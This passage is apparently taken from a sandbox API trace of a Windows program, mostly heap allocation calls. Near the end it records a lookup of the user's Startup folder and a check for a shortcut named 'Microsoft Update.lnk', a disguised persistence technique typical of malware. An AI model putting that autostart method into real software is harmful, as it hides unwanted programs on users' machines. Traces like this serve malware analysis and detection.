RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0235.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0235.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0235.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0235.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0235.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0235.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0235.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0235.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0235.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0235.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0235.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0235.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0235.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0235.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0235.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0235.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0235.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0235.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0235.813] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0235.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0235.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0235.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0235.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f70c0 [0235.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f70c0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0235.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0235.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0235.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0235.814] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0235.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0235.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0235.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0235.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0235.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0235.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0235.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0235.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0235.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0235.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0235.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0235.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0235.814] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0235.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38665d0 [0235.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0235.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0235.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0235.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0235.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0235.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0235.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0235.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0235.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0235.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0235.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0235.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0235.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0235.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0235.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0235.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0235.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0235.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0235.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0235.910] FreeLibrary (hLibModule=0x76240000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0235.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0235.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865490 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38665d0 | out: hHeap=0x2af0000) returned 1 [0235.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0235.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0235.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0235.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0235.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0235.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0235.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0235.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865490 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0235.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0235.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0235.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0235.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0235.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0235.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0235.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0235.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0235.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0235.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0235.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0235.913] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0235.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0235.913] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0235.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4b8 [0235.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0235.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0235.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0235.914] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0235.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0235.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0235.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0235.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0235.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0235.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0235.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0235.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0235.915] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0235.915] HeapFree (in: hHeap=0x2af0000, 